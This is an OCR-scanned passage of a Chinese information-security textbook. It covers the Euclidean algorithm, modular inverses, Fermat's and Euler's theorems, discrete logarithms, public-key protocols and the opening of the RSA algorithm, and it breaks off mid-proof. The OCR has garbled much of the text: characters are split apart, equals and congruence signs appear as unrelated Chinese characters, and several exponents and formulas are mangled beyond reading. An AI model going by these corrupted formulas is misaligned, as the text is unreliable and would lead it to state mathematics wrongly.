(1) A<a,B<b; 

(2) 若 B 二 0, 则 返回 A 二 gcd(a,0b); 

(3) R=A mod B; 

(4) A<—B; 
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(5) B<-R; 
(6) 转 到 (2) 。 
例题 : 求 gcd(1180,482) 。 
解 : 因为 1180 二 2X482 十 216, 即 216 一 1180 mod 482 ,所 以 
gcd(1180,482) 一 gcd(482,216) 
同 理 ,482 一 2X216 十 50, 即 50 一 482 mod 216, 所 以 
gcd(1180,482) = gcd(482,216) = gcd(216,50) 
依 此 类 推 
gcd(1180,482) = gcd(2,0) 一 2 
或 者 可 以 直接 通过 如 下 推导 : 
1180 = 2 X 482 十 216 
482 = 2X216 十 50 
216 = 二 4X50+16 
50 一 3X16 十 2 
16 一 8X2 十 0 
所 以 gcd(482,1180) 一 2 


423 乘法 逆 元 


定义 : 如 果 gcd(a.6) 二 1, 那 么 : 
(1) 存在 a '!, 使 aXa ! 志 1 mod 6, 即 (aXaT!) modb =1; 
(2) 存在 0", 使 Xb7! 二 1 mod a, 即 (6Xb7!) mod a=1。 
这 里 ,把 a ' 称 为 a 模 b 的 乘法 逆 元 ,0: 称 为 4 模 a 的 乘法 逆 元 。 
例如 ,5 模 14 的 乘法 逆 元 是 3, 因 为 5X3=15(mod 14) 二 1。2 模 14 却 没 有 乘法 逆 元 。 
一 般 而 论 , 如 果 a 和 nn 是 互 素 的 , 即 gcd(a.n) 一 1, 那 么 a 模 n 的 乘法 道 元 a-! 三 
zz (mod n) 有 了 唯 一 解 ; 否则 ,a7! 夺 x (mod nn) 无 解 。 
那么 ,如 果 a 入 互 素 ,如 何 才能 计算 出 a 模 n 的 乘法 逆 元 呢 ? 将 欧 几 里 得 算法 做 扩展 
( 称 为 扩展 的 欧 几 里 得 算法 ) 即 可 用 于 求解 乘法 道 元。 详细 的 算法 这 里 不 做 缆 述 , 仅 通过 一 
个 例题 使 读者 了 解 其 中 的 技巧 。 
例题 : 求解 11111 模 12345 的 乘法 逆 元 , 即 求解 ,使 得 11111z (mod 12345) 一 1。 
解 : 首先 根据 欧 几 里 得 算法 计算 这 两 个 数 的 最 大 公约 数 gcd(11111,12345) ,如果 结果 
为 1, 本 题 才 有 解 。 
因为 
12345 = 1 X11111 十 1234 
11111 = 9 X1234+5 
1234 = 246 X 5 十 4 
5 一 1X4 十 1 
4 一 4X1 二 0 


四 四 所 日 


所 以 
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gcd(11111,12345) = gcd(4,1) 一 1 
然后 ,由 上 面 的 推导 再 一 步 一 步 反 推 回去 : 
由 式 @ 可 得 : 1 一 5 一 1X4 
由 式 @ 可 得 : 4 二 1234 一 246X5 
由 式 @ 可 得 : 5 二 11111 一 9X1234 
由 式 @ 可 得 : 1234 二 12345 一 1 X11111 
将 @@ 代 入 加 .DO 代 入 @ .@ 代 入 @ 可 得 
1 一 5 一 1X(1234 一 246X5) 一 247X5 一 1X1234 

一 247X (11111 一 9X1234) 一 1 X 1234 

=247 X 11111 一 2224 X 1234 

一 247X 11111 一 2224X (12345 一 1X 11111) 

一 2471 X 11111 一 2224 X 12345 
由 此 可 得 11111 模 12345 的 乘法 逆 元 为 2471, 因 为 2471X11111 (mod 12345) 一 1。 
与 此 同时 ,我们 也 得 到 了 12345 模 11111 的 乘法 逆 元 为 一 2224。 


@AAQA 


424 费 尔 马 小 定理 


费 尔 马 (Fermat) 小 定理 : 如 果 p 是 一 个 素数 ,有 a 不 是 p 的 倍数 , 则 a?7! 夺 1 (mod p)。 
证 明 : 设 有 一 整数 空间 S={1,2,…,p 一 1); 再 设 有 一 函数 (x) 二 azr(mod 站),zES， 
显然 ,和 (z+) 二 p。 
(1) 首先 我 们 来 证 明 对 于 任何 zxES,. 有 更 (z)ES, 即 更 (z) 天 0。 采 用 的 方法 是 反 证 法 。 
假设 亚 (x) = 0, 那 么 az 三 0 (mod p) OO 
因为 p 是 一 个 素数 , 且 a 不 是 p 的 倍数 ,所 以 gcd(a,p) 王 1, 那么 根据 除法 定理 , 式 中 两 
边 可 同 除 以 a, 即 x 三 0 (mod p), 也 就 是 说 能 被 p 整除 ,这 与 ES 相 矛 盾 。 所 以 (Xx) ES 
得 证 。 
(2) 然后 我 们 来 证 明 对 于 x€ES 和 yES,x 关 y, 有 亚 (x) 关 亚 (y)。 采 用 的 方法 是 反 
证 法 。 
假设 有 zz 和 yy,zx 关 y, 有 亚 (x) 二 亚 (y), 即 ax (mod Pp) 二 ay (mod p), 那 么 
ar 三 ay (mod p) © 
因为 p 是 一 个 素数 , 且 a 不 是 p 的 倍数 ,所 以 gcd(a,p) 二 1, 那么 根据 除法 定理 , 式 @ 两 
边 可 同 除 以 a, 得 到 zx 三 y (mod p), 即 x 一 y 二 kp,k 为 整数 。 
而 1 二 zp 一 1,1 二 yp 一 1, 所 以 & 只 能 为 0。 亦 即 zx 一 y, 与 zx 夫 >y 矛盾。 
所 以 , 严 (z) 天 更 (y) 得 证 。 
通过 以 上 两 步 证 明 可 知 ,对 于 集合 S 二 {1,2,…,p 一 1), 把 S 中 的 p 一 1 个 元 素 代入 函 
数 亚 (z) 二 az(mod p) ,得 到 p 一 1 个 函数 值 组 成 的 集合 KK, 其 实 就 是 S 自身 , 即 太一 S。 
那么 把 这 两 个 集合 中 的 元 素 分 别 进行 乘积 ,所 得 的 结果 也 应 该 相等 : 
1X2X…X( 方 一 1 三 更 (1) X 更 (2) XxX Xp—1) 
=(aX 1)(mod p) XxX (aX2)(mod p)X… 
X[ax(z 一 1)]Cmod p) 
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根据 模 运 算 的 乘法 定理 可 得 : 
1X2x*…X(p—1D)=a[lX2X-.… xX (p— mod p) @ 
因为 p 是 一 个 素数 ,所 以 ,gcd(j,p) 二 1,j 二 1.2,…,p 一 1。 根 据 除法 定理 , 式 @ 的 左右 
两 边 可 依次 同 除 以 1,2,…,p 一 1, 得 到 1 二 a*"' (mod p), 即 a*-! 圭 1 (mod p) 得 证 。 


425 欧 拉 函 数 和 欧 拉 定 理 


1. 欧 拉 函数 


定义 : 小 于 nn 且 与 n 互 素 的 正 整 数 的 个 数 , 记 为 @(z) ,把 B(n) 称 为 欧 拉 函 数 。 
显然 ,对 于 素数 p, 每 一 个 小 于 p 的 正 整 数 皆 与 p 互 素 ,所 以 有 ®(p) 一 p 一 1。 
定理 : 设 有 两 个 素数 p 和 g,p 取 q, 那 么 对 于 n= 二 pq, 有 
Bn) = Bpq) = BD(p) X Bg) = (p—1)X(g—1) 
证 明 : 小 于 的 正 整 数 为 {1,2,…,(pg 一 1)} ,一 共 (pg 一 1) 个 。 其 中 与 不 互 素 的 有 : 
{p,2p，…,(g 一 1)p} 和 {gq,2g,…,(p 一 1)q}) ,分 别 为 (g 一 了 个 和 (p 一 了 个 。 所 以 ,BD(n) 一 
(pq—1)—(g—1)—(p—1)= (p 一 1) (g 一 1) 一 @B(p)X@(g), 得 证 。 


2. 欧 拉 定理 


欧 拉 定理 : 对 于 任意 互 素 的 整数 a 和 ,有 a”” 三 1 mod n, 这 里 B(n) 是 欧 拉 函 数 。 
例如 : 


Q& 一 3,7 10,®(10) 4 81 1 mod 10 
a=2,n 11,®(11) 1052” 1024 1 mod 11 

下 面 我 们 来 证 明 欧 拉 定 理 。 

对 于 整数 ,与 n 互 素 的 数 有 (nm) 个 , 令 这 些 数 为 : R 二 (To,… ,zoow), 用 a 与 R 中 
的 每 一 个 元 素 相 乘 并 模 ，, 得 到 集合 S= {axi (mod n) ,axs (mod n) ,azem (mod n))。 

下 面 要 证 明 的 是 : S 其 实 就 是 R, 即 S 二 R。 证明 过 程 分 两 步 : 

(1) 首先 证 明 (ax; mod n) ER,i 二 1,2,…,@(n)。 即 证 明 S 中 的 每 一 个 元 素 都 属于 R。 
因为 a 与 n 互 素 ,zx; 与 n 也 互 素 ,所 以 ,ax; 与 n 也 互 素 ; 又 因为 (az mod n) 二 n, 所 以 ， 
(azi mod n) ER, 

(2) 然后 证 明 S 中 的 元 素 是 唯一 的 , 即 对 于 不 相等 的 zk 和 zs, 有 azxi(mod 7z) 天 
axzs(mod 72) 。 采 用 反 证 法 。 假 设 在 尺 中 存在 zi 天 zs ,使 得 azi(mod n) 二 azx, (mod n)。 

如 果 azi(mod n) 二 axs(mod n) ,根据 模 运算 的 乘法 定理 可 知 : (a mod n) (zimod 7 一 
(a mod n) (xs mod nn), 即 x mod xz 一 zs modm 因为 zx 和 zs 均 小 于 nn, 所 以 ,zi 二 z ,这 与 
假设 相 了 矛盾, 得 证 。 

通过 以 上 两 步 可 知 ,S 一 R。 

既然 S= 尺 ,那么 S 中 各 元 素 相 乘 等 于 R 中 各 元 素 相 乘 , 即 


Bn) 


gn) 
IIlz; = Tlea ximodn 
i=1 i=1 


亦 即 : zi Xzxs XXreow =(ar mod n) (axr: mod 2)…(azeom mod n) 
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= (am mod n) (x1 mod n) (zs mod 2)…(Czeom mod n) 


一 (aesm mod zz)(ziXzzX…Xzeom) 


两 边 同 时 约 去 zi XXzsX…Xzew ,得 到 1= am mod n, 即 a*" 寺 1 mod n。 
426 离散 对 数 


1. 本 原 根 


由 Euler 定理 可 知 , 互 素 的 a 和 nn, 有 a”"” 三 1 mod n, 其 中 @(z) 是 欧 拉 函 数 , 指 小 于 7 
且 与 交互 素 的 正 整数 的 个 数 。 也 就 是 说 ,至 少 存在 一 个 整数 六 ,使 a" 志 1 mod n 成 立 。 

那么 ,把 使 得 a”" 寺 1 mod n 成 立 的 最 小 正 笑 m , 称 为 a 的 阶 ,或 者 称 为 a 所 属 的 模 n 的 
指数 , 亦 或 a 所 产生 的 周期 长 。 

例如 ,7: mod 19==7,7? mod 19 二 11,7? mod 19 二 1。 那 么 

74 mod 19 = (7! X73) mod 19= (7! mod 19) X(73 mod 19)=7X1=7 

所 以 ,7% mod 19 一 73 mod 19 二 1,7*+i mod 19 二 (7*X7') mod 19 一 7 mod 19。 因 此 ,m 二 3， 
即 7 所 属 的 模 19 的 指数 等 于 3。 

如 果 使 得 a” 三 1 mod n 成 立 的 最 小 正 舌 m 满足 二 @B(n) , 则 称 a 是 n 的 本 原 根 。 

本 原 根 的 性 质 如 果 a 是 的 本 原 根 , 且 zi 一 al mod mdzs 一 0 mod 7 ,Xow 一 
am mod 2， 那么 zi 天 zz 天 … 天 zoom , 且 zoom 一 1。 

特别 地 ,对 于 素数 p, 若 a 是 p 的 本 原 根 , 则 (a! mod p) 关 (a? mod 户 … 天 (ao mod p)。 


2. 离散 对 数 


某 素数 p, 有 本 原 根 4a, 目 Xi 一 al mod p,Xs 一 a? mod p，,…,X,-1 二 ar-! mod p, 那 么 有 
Til 天 Ta 天 … 天 To-l 

令 S=(zaeyzoi),T=(1.2,…,b 一 1) ,那么 显然 有 S=T。 

对 于 任意 整数 5b, 可 以 表示 为 6 三 r mod p (0 三 7 三 p 一 1), 当 7r 关 0 时 ,也 就 是 说 rET, 即 
r 的 值 等 于 集合 S 中 的 某 个 元 素 x; 二 ai mod p, 即 对 于 4b 和 素数 p 的 本 原 根 4a, 有 了 唯一 的 短 
i, 使 得 6 三 a' mod p,0i 二 p 一 1。 这 里 的 指数 i 称 为 a 模 p 的 4 的 指标 ,或 称 离散 对 数 , 记 
为 inds,s (5b)。 当 7 二 0 时 ,离散 对 数 无 解 。 

离散 对 数 的 性 质 。 

(1) inds,p(1) 二 0 (因为 a mod p= 二 1 mod p==1)。 

(2) inds,p (a) 二 1 (因为 aa mod Pp 二 a)。 

(3) inds,p (Czy) [inds,y (7) + inds,s (y)] mod ®(p). 

证 明 : 因为 

TX 二 a 


ind,,p 人) ind,,, (3) 


mod pry = a™ Ymod prry = andocomod p 
所 以 
a™p mod p = a™s Htind,p Wy mod p (0 
根据 欧 拉 定理 ,对 于 互 素 的 整数 a 和 p, 有 a”” 圭 1 mod p, 即 a* ' 寺 1] mod p。 
所 以 对 于 任意 整数 i, 有 a™*?*? mod p 王 (a’ mod p)(a*?Y mod p)=a' mod p。 
所 以 由 式 @ 可 知 ,inds,s (zy) 一 [ind (x) Tinds,s (y)]+k(p—1)=[ind,, (x)++ 


ind。,(y)] 十 AGO(P) 。 
即 inds,p (zxy) 寺 [inds,p (zx) 十 inds,p(y)]」 mod G(p) ,得 证 。 

由 性 质 (3) 可 得 到 如 下 性 质 。 

(4) inds,, (y")[r Xinds,,(y)] mod ®(p)。 

离散 对 数 的 这 四 个 性 质 与 普通 对 数 的 性 质 (log. (1) 二 0; log; (zx) 二 1; log; (yz) 二 
log.(y) 十 log-(x); log.(y) 一 -log.(y)) 非 常 相似 , 正 是 这 个 原因 , 才 把 “指标 ?又 称 为 “离散 
对 数 ”。 

通常 , 求 离散 对 数 是 非常 困难 的 。 

对 于 方程 > 一 8* mod p ,如 果 给 定 g,x,p, 要 计算 > 是 比较 容易 的 。 

但 如 果 给 定 y,g,p, 求 x 二 inds,, (y)( 求 离散 对 数 ) 是 非常 困难 的 ,其 难度 与 RSA 中 因 
子 分 解 素数 之 积 的 难度 有 相同 的 数量 级 。 这 也 正 是 离散 对 数 被 用 于 密码 学 的 原因 。 


43 公 钥 密码 体制 的 基本 原理 


公 钥 密码 学 与 其 他 密码 学 完全 不 同 。 公 钥 算 法 使 用 两 个 独立 的 密 钥 ,每 个 用 户 都 有 一 
对 选 定 的 密 钥 ( 公 钥 i 、 私 钥 &,) ,公开 的 密 钥 k 可 以 像 电话 号 码 一 样 进行 注册 公 
它 基于 数学 函数 而 不 像 传统 加 密 体制 那样 基于 代 换 和 置换 。 


43.1 公 钥 密码 体制 的 基本 构成 


公 钥 密码 体制 依赖 于 一 个 加 密 密 钥 和 一 个 与 之 相关 的 不 同 的 解密 密 钥 。 公 钥 密 码 体制 
由 四 个 部 分 组 成 。 

(1) 明文 : 算法 的 输入 ,它们 是 可 读 信息 或 数据 ,用 M 表示 。 

(2) 密 文 : 算法 的 输出 。 依 赖 于 明文 和 密 钥 ,对 给 定 的 消息 ,不 同 的 密 钥 产 生 密 文 不 
同 。 用 EE 表示 。 

(3) 公 钥 和 私 钥 : 算法 的 输入 。 这 对 密 钥 中 一 个 用 于 加 密 ,为 K., 此 密 钥 公开 ; 一 个 用 
于 解密 ,为 Ku, 此 密 钥 保密 。 加 密 算法 执行 的 变换 依赖 于 密 钥 。 

(4) 加 密 、 解 密 算法 。 应 用 两 个 不 同 的 密 钥 : 一 个 是 公开 的 ,一 个 是 秘密 的 。 从 公开 密 
钥 ( 简 称 为 公 钥 ) 很 难 推断 出 私人 密 钥 (简称 私 钥 )。 持 有 公 钥 的 任何 人 都 可 以 加 密 消息 ,但 
却 无 法 解密 。 只 有 持 有 私 钥 的 人 才能 够 解密 。 

一 般 的 情况 下 ,网 络 中 的 用 户 约定 一 个 共同 的 公 钥 密码 系统 ,每 个 用 户 都 有 自己 的 公 钥 
和 私 钥 ,并 且 所 有 的 公 钥 都 保存 在 某 个 公开 的 数据 库 中 ,任何 用 户 都 可 以 访问 此 数据 库 ,一 
来 可 以 把 自己 的 公 钥 上 传 到 此 数据 库 , 二 来 可 以 从 该 数据 库 下 载 别 人 的 公 钥 。 这 样 一 次 基 
于 公 钥 加 密 体制 的 秘密 通信 (例如 发 送 方 为 Alice, 接 收 方 为 Bob) 的 过 程 如 图 4-1 所 示 , 具 
体 可 以 描述 如 下 : 

(1) Alice 从 公开 数据 库 中 取出 Bob 的 公 钥 K.。 

(2) Alice 用 Bob 的 公 钥 加 密 她 要 传 给 Bob 的 消息 ,然后 传送 给 Bob: C 一 ECOM,K。) 。 

(3) Bob 用 他 的 私 钥 解密 Alice 的 消息 。M 王 DCC,K。) 。 


信息 安全 原理 及 应 用 


图 4-1 公 钥 密码 体制 下 的 秘密 通信 


这 种 公 钥 加 密 体制 有 许多 传统 加 密 体制 所 没有 的 特点 和 优点 : 

(1) 加 密 和 解密 能 力 分 开 。 

(2) 多 个 用 户 加 密 的 消息 只 能 由 一 个 用 户 解读 ,可 用 于 公共 网 络 中 实现 保密 通信 。 

(3) 用 私 钥 加 密 的 消息 可 以 用 对 应 的 公 钥 解密 ,所 以 由 一 个 用 户 加 密 消息 而 使 多 个 用 
户 可 以 解读 ,可 用 于 认证 系统 中 对 消息 进行 数字 签字 。 

(4) 无 须 事 先 分 配 密 钥 。 

(5) 密 钥 持 有 量 大 大 减少 。 在 个 用 户 的 团体 中 进行 通信 ,每 一 用 户 只 需要 持 有 自己 
的 私 钥 , 而 公 钥 可 放置 在 公共 数据 库 上 , 供 其 他 用 户 取 用 。 这 样 ,整个 团体 仅 需 拥有 对 密 
钥 , 就 可 以 满足 相互 之 间 进行 安全 通信 的 需求 (实际 中 , 因 安 全 方面 的 考虑 ,每 一 用 户 可 能 持 
有 多 个 密 钥 ,分 别 用 于 数字 签名 、 加 密 等 用 途 。 此 种 情况 下 ,整个 团体 拥有 的 密 钥 对 数 为 n 
的 倍数 。 但 即使 如 此 ,与 使 用 对 称 密码 技术 时 需要 n(n 一 1)/2 个 不 同 的 密 钥 相 比 ,需要 管理 
的 密 钥 数 量 仍 显著 减少 )。 

(6) 提供 了 对 称 密码 技术 无 法 或 很 难 提供 的 服务 : 如 与 喻 希 函 数 联合 运用 可 生成 数字 
签名 、 可 证 明 的 安全 伪 随 机 数 发 生 器 的 构造 ,以 及 零 知 识 证 明 等 。 


432 加 密 解 密 协 议 


当 通 信 双 方 进行 保密 通信 时 ,根据 其 需要 不 同 , 选 择 的 加 解密 密 钥 也 不 同 。 以 Alice 和 
Bob 作为 通信 双方 。Alice 的 密 钥 为 K.- 和 天 。 ,Bob 的 密 钥 为 Ks 和 Kw ,其 中 K。, 和 K 为 
公 钥 ,保存 在 某 个 公开 数据 库 中 。 


1. 保证 机 密 性 


保证 消息 机 密 性 的 传输 方式 在 上 一 小 节 中 已 阐述 过 。 即 Alice 从 公开 数据 库 中 取出 
Bob 的 公 钥 Ku ,然后 用 Bob 的 公 钥 加 密 她 的 消息 并 传送 给 Bob: C 二 E(M,K), 最 后 Bob 
用 他 的 私 钥 解密 Alice 的 消息 M=D(M., Kw)。 

具体 过 程 如 图 4-2 所 示 。 


149 年? 了 


ks E(M. Koe) Ks 


图 4-2 仅 保证 消息 的 机 密 性 


第 4 章 ” 公 钥 密 码 体 制 


这 个 协议 很 好 地 保证 了 数据 的 机 密 性 。 当 通信 信道 中 有 人 截获 了 密 文 ,由 于 不 知道 
Bob 的 私 钥 Ka ,无 法 解 出 对 应 的 明文 。 

但 这 个 方法 无 法 保证 信息 的 真实 性 。 这 是 因为 密 钥 库 是 共享 的 ,任何 人 都 能 够 查 到 B 
的 公 钥 Ku ,因此 任何 人 都 可 以 冒充 A 通过 发 送 假 密 文 C 二 E(M, Ki ) 来 发 送 假 数据 M 给 
B, 而 了 不 能 发 现 。 

为 了 确保 数据 的 真实 性 ,可 以 采用 下 面 的 协议 。 


2. 保证 真实 性 

(1) Alice 首先 用 自己 的 私 钥 Ke 加 密 M, 得 到 密 文 C: C=E(M ,Ka)。 
(2) 将 C 发送 给 Bob。 

(3) Bob 接收 到 C 后 ,在 数据 库 里 查 到 Alice 的 公 钥 K。。 

(4) 用 开 。 解 密 C 得 到 M: M=D(C,K,.)。 

具体 过 程 如 图 4-3 所 示 。 


Ka E(M.Kag) Ky 
图 4-3 保证 消息 的 真实 性 


由 于 只 有 Alice 才 拥 有 Ka ,所 以 只 有 用 户 A 能 够 发 送 数据 E(M,K。s)。 假 设 有 人 时 
充 A, 用 自己 的 私 钥 Ki 加 密 明 文 M ,得 到 ECM,K),Bob 收 到 EC(M,K) 之 后 ,是 无 法 用 
Alice 的 公 钥 K。. 解 密 得 到 明文 M 的 。 

然而 这 一 协议 不 能 确保 数据 的 机 密 性 。 因 为 公 钥 数 据 库 共享 ,任何 人 都 能 够 得 到 A 的 
公 钥 K。, ,因此 任何 人 都 可 以 对 E(M, Ka ) 解 密 获 得 数据 M。 


3. 既 保证 机 密 性 又 保证 真实 性 


(1) Alice 用 自己 的 私 钥 Ks 加 密 M ,得 到 密 文 Ci 二 EC(M ,Kos)。 
(2) Alice 从 公开 数据 库 中 取出 Bob 的 公 钥 Ku 。 

(3) Alice 用 Bob 的 公 钥 KK. 加密 Ci ,得 到 Cs 一 ECC ,Kee) 。 

(4) 将 Cs 发 送 给 Bob。 

(5) Bob 接收 到 C* 后 ,用 他 的 私 钥 Ku 解密 C* 得 到 密 文 Ci 。 
(6) Bob 用 KK 解密 Ci 得 到 M。 

具体 过 程 如 图 4-4 所 示 。 


99 出 9 出 9 出 9 


Kg CI=E(M.Kad) Kee ECCiKie) Koa Gi -Ws 


图 4-4 保证 消息 的 机 密 性 和 真实 性 


信息 安全 原理 及 应 


由 于 这 一 通信 协议 综合 利用 了 上 述 两 个 通信 协议 ,所 以 能 够 同时 确保 数据 的 机 密 性 和 
真实 性 。 具 体 的 ,由 于 只 有 用 户 A 才 拥有 保密 的 密 钥 Ka ,而 且 由 公 钥 K。, 在 计算 上 不 能 推 
导出 私 钥 K。a ,所 以 只 有 用 户 A 才能 进行 发 方 的 第 一 步 操作 ,才能 够 发 送 数 据 M。 其 他 任 
何人 无 法 冒充 A。 从 而 确保 了 信息 的 真实 性 。 

又 由 于 只 有 用 户 B 才 拥有 保密 的 解密 钥 Kw ,所 以 只 有 用 户 B 才能 够 进行 接收 方 的 第 
二 步 操作 ,才能 获取 明文 M。 从 而 确保 了 数据 的 秘密 性 。 

需要 进一步 说 明 的 是 ,在 这 个 协议 中 ,双方 使 用 密 钥 的 顺序 不 能 更 改 。 也 就 是 ,发 送 方 
必须 先 使 用 自己 的 私 钥 来 加 密 明 文 ,再 使 用 对 方 的 公 钥 来 加 密 中 间 密 文 ; 接收 方 先 使 用 自 
己 的 私 钥 来 解密 C, 得 到 中 间 密 文 ,然后 再 使 用 对 方 的 公 钥 来 解 出 明文 M。 如 果 更 改 了 顺 
序 , 发 送 方 首先 使 用 了 对 方 的 公 钥 来 加 密 明文 ,产生 中 间 密 文 ,然后 用 自己 私 钥 加 密 中 间 密 
文 。 那 么 密 文 在 发 送 过 程 中 如 果 被 人 截获 ,截获 者 可 以 先 利 用 发 送 方 的 公 钥 解密 密 文 ,得 到 
中 间 密 文 , 然 后 用 自己 的 私 钥 对 中 间 密 文 进行 加 密 , 冒 充 发 送 方 将 密 文 发 送出 去 ,而 接收 方 
无 法 发 现 。 这 样 就 无 法 保证 信息 的 真实 性 。 


433 公 钥 密码 应 满足 的 要 求 


上 述 的 密码 体制 建立 在 基于 两 个 相关 密 钥 的 密码 算法 之 上 。Diffie 和 Hellman 假定 这 
个 体制 存在 ,虽然 没有 证 明 这 种 算法 的 存在 性 ,但 他 们 给 出 了 这 些 算法 应 该 满足 的 条 件 : 

(1) 用 户 产 生 一 对 密 钥 (K., Ks) 在 计算 上 是 容易 的 。 

(2) 已 知 公 钥 和 要 加 密 的 消息 M, 发 送 方 产生 相应 的 密 文 C 一 ECM,K.) 在 计算 上 是 容易 的 。 

(3) 接收 方 使 用 其 私 钥 对 接收 的 密 文 解密 M 一 DCM,Ku) 在 计算 上 是 容易 的 。 

上 面 的 三 个 条 件 是 公 钥 密码 的 工程 实用 条 件 。 因 为 只 有 算法 高 效 ,密码 才能 实际 应 用 。 
否则 ,可 能 只 有 理论 意义 ,而 无 实用 价值 。 

(4) 已 知 公 钥 K. 时 ,攻击 者 要 确定 其 对 应 的 私 钥 Ks 在 计算 上 不 可 行 。 

这 个 条 件 是 公 钥 密码 的 安全 条 件 ,是 公 钥 密码 的 安全 基础 ,而 且 这 一 条 件 是 最 难 满 足 
的 。 由 于 数学 水 平 的 限制 ,目前 尚 不 能 从 数学 上 证 明 一 个 公 钥 的 算法 完全 满足 这 一 条 件 ,而 
只 能 证 明 它 不 满足 这 一 条 件 。 这 就 是 满足 这 个 条 件 困难 的 根本 原因 。 

(5) 加 密 和 解密 的 顺序 可 以 互 换 , 即 对 于 所 有 的 明文 都 有 D(ECM, K.), Ku) 一 
E(D(M, Ka),K.)=M., 

在 公 钥 密码 学 概念 提出 后 的 几 十 年 中 ,事实 证 明 , 要 满足 以 上 条 件 是 很 不 容易 的 。 因 为 
这 些 要 求 最 终 可 以 归结 到 设计 一 个 单 向 陷 门 函数 。 单 向 函数 是 满足 下 列 性 质 的 函数 : 每 个 
函数 值 都 存在 唯一 的 逆 , 计 算 函 数值 是 容易 的 ,但 求 逆 却 是 不 可 行 的 : 

Y= 二 了 (X) 已 知 X 值 ,计算 Y 值 容易 ; 

X 一 广 !(Y) 已 知 Y 值 , 求 X 值 不 可 行 。 

一 个 实用 的 公 钥 密码 系统 的 建立 和 发 展 依赖 于 找到 一 个 单 向 陷 门 函数 。 这 个 函数 的 安 
全 性 决定 了 公 钥 加 密 算法 的 安全 性 。 

和 对 称 密码 体制 一 样 ,如 果 密 钥 太 短 , 公 钥 密码 体制 也 易 受 到 穷 举 攻击 。 因 此 密 钥 必须 
足够 长 才能 抗击 穷 举 攻击 。 然 而 又 由 于 公 角 密码 体制 所 使 用 的 可 逆 函 数 的 计算 复杂 性 与 密 
钥 长 度 常常 不 是 呈 线 性 关系 ,而 是 增 大 得 更 快 。 所 以 密 钥 长 度 太 大 又 会 使 得 加 解密 运算 太 


慢 而 不 实用 。 因 此 公 钥 密码 体制 目前 主要 用 于 密 钥 管理 和 数字 签字 。 

对 公 钥 密码 算法 的 第 二 种 攻击 法 是 寻找 从 公 钥 计算 私 钥 的 方法 。 目 前 为 止 ,对 常用 公 
钥 算法 还 都 未 能 够 证 明 这 种 攻击 是 不 可 行 的 。 

自 1976 年 W. Diffie 和 M. E. Hellman 提出 了 公 钥 密码 的 概念 后 ,由 于 其 优良 密码 学 特 
性 和 广阔 应 用 前 景 ,很 快 吸引 了 全 世界 的 密码 爱好 者 ,他 们 提出 了 各 种 各 样 的 公 钥 密码 算法 
和 应 用 方案 ,密码 学 进入 了 一 个 空前 繁荣 的 时 代 。 然 而 公 钥 密码 的 研究 并 非 易 事 , 尽 管 提出 
的 方案 很 多 ,但 能 经 得 起 时 间 考 验 的 却 寥寥 无 几 。 经 过 三 十 多 年 的 研究 和 发 展 ,目前 世界 公 
认 的 比较 安全 的 公 钥 密码 有 基于 大 数 分 解困 难 性 之 上 的 RSA 密码 类 和 基于 有 限 域 上 离散 
对 数 困难 性 的 ELGamal 密码 类 。 
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RSA 是 1977 年 由 美国 麻 省 理工 学 院 的 Ron Rivest\ Adi Shamir 和 Leonard Adleman 
一 起 提出 的 。RSA 就 是 他 们 三 人 姓氏 开头 字母 拼 在 一 起 组 成 的 。 

RSA 算法 的 可 靠 性 基于 大 数 的 因子 分 解 问题 。 假 如 有 人 找到 一 种 很 快 的 分 解 因子 的 
算法 的 话 ,那么 用 RSA 加 密 的 信息 的 可 靠 性 就 肯定 会 极度 下 降 。 但 找到 这 样 的 算法 的 可 能 
性 是 非常 小 的 。 今 天 只 有 短 的 RSA 密 钥 才 可 能 被 穷 举 方式 解 破 。 到 目前 为 止 ,世界 上 还 没 
有 任何 可 靠 的 攻击 RSA 算法 的 方式 。 只 要 其 密 钥 的 长 度 足够 长 ,用 RSA 加 密 的 信息 实际 
上 是 不 能 被 解 破 的 。 

RSA 公 钥 密码 算法 是 目前 网 络 上 进行 保密 通信 和 数字 签名 的 最 有 效 的 安全 算法 之 一 。 
RSA 算法 的 安全 性 基于 数论 中 大 素数 分 解 的 困难 性 ,所 以 ,RSA 需 采 用 足够 大 的 整数 。 
子 分 解 越 困难 ,密码 就 越 难以 破译 ,加 密 强度 就 越 高 。 

由 于 RSA 密码 既 可 以 用 于 加 密 , 又 可 以 用 于 数字 签名 ,安全 、 易 懂 , 因 此 RSA 密码 已 经 
成 为 目前 应 用 最 广泛 的 公 钥 密码 。 许 多 国际 化 标准 组 织 , 如 ISO ITU 和 SWIFT 等 都 已 经 
接受 RSA 作为 标准 。Internet 网 的 E-mail 保密 系统 以 及 国际 VISA 和 MASTER 组 织 的 
电子 商务 协议 SET 协议 中 都 将 RSA 作为 传送 会 话 密 钥 和 数字 签名 的 标准 。 


441 RSA 算 法 


RSA 算法 使 用 了 乘 方 运算 。 

在 加 密 时 ,明文 M 经 过 加 密 运 算得 到 密 文 C: C 一 M mod n。 

密 文 在 经 过 解密 得 到 明文 M: C? mod ?一 (M: mod n)* mod n= M™” mod 7 一 M。 

即 必须 存在 e,d,n, 使 M” mod n 一 M 成 立 。 这 里 以 nn,e 为 公 钥 , 私 钥 为 4d。 那么 ,现在 
的 问题 是 ,如 何 才 能 找到 能 够 使 M” mod "一 M 成 立 的 参数 e,d,n 呢 ? 

RSA 算法 给 出 了 下 列 确定 e,d,n 的 方法 : 

(1) 确定 n: 独立 地 选取 两 大 素数 p 和 g( 各 100 一 200 位 十 进 制 数 字 ) ,计算 n 二 pXg。 

(2) 确定 e: 计算 nn 的 欧 拉 函数 值 g(n) 一 (p 一 1)(g 一 1), 随 机 选择 一 整数 e, 使 得 1 三 
e 过 pg(n) 和 gcd(g(n),e) 二 1 成立。 

(3) 确定 d: 计算 e 模 gp(n) 的 乘法 逆 元 , 即 为 d: ed 三 1 mod 9(n)。 
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下 面 证 明 一 下 通过 上 面 3 个 步骤 确定 的 e,d,n 的 确 能 够 使 M” mod xz 一 M 成 立 。 
证 明 : 因为 ed 二 1 mod p(n) 即 ed 二 kg(n) 十 1,k 为 整数 。 所 以 ; M* 一 Most 。 
(1) 如 果 M 和 nn 互 素 , 即 gcd(M,n) 二 1。 
那么 ,根据 欧 拉 定理 (如 果 gcd(a,n) 二 1, 则 a*” 志 1 mod n), 有 
Mr 二 1 modn 
所 以 
Me =M”*"+ = MLMro J modn=M[llmodn=Mmodn 
(2) 如 果 M 入 不 互 素 , 即 gcd(M,n) 取 1, 即 M 和 n 有 大 于 1 的 公约 数 。 
因为 n= 二 pq, 而 pg 都 是 素数 ,不 可 再 分 解 ,所 以 M 一 定 包含 了 p 或 g 为 因子 。 
